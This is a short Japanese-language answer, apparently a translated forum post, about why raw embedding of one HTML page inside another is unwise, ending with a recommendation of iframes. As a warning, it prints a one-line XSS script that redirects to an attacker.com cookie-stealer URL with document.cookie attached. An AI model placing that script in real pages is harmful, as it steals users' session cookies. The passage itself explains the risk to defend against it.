簡単な答え: できません。
長い答え: できますが、それは難しく、エラーが発生しやすく、大きなセキュリティ リスクが伴います。
これが別のページを埋め込みたいページだとしましょう:
<!DOCTYPE html public>
<html>
<head>
<title>My Page</title>
</head>
<body>
<div id="embedMe"></div>
</body>
</html>
次に、最初のページに埋め込むページのコードを次に示します。
<!DOCTYPE html public>
<html>
<head>
<title>My Embedded Page</title>
</head>
<body>
<div id="content">
Something interesting here...
</div>
</body>
</html>
次に、埋め込まれた場合:
<!DOCTYPE html public>
<html>
<head>
<title>My Page</title>
</head>
<body>
<div id="embedMe">
<!DOCTYPE html public>
<html>
<head>
<title>My Embedded Page</title>
</head>
<body>
<div id="content">
Something interesting here...
</div>
</body>
</html>
</div>
</body>
</html>
あなたは問題を見ることができます。2 つのhtml
要素、2 つhead
の 、2 つbody
の 、2 つtitle
の 、さらには 2 つの がありDOCTYPES
ます。これは善意の例です。攻撃者は、埋め込むページの URL を次の内容を含むものに変更できるとします。
<script type="text/javascript">
window.location.href = "http://www.attacker.com/cookiestealer.php?cookies=" + document.cookie;
</script>
突然、ユーザーは自分のアカウントがハッキングされたことに不満を漏らし、その責任はあなたの肩にかかっています。これは XSS の単純な例であり、実際の攻撃者はそれをよりうまく隠すことができます。iframe を使用してください。それが彼らのために作られたものです。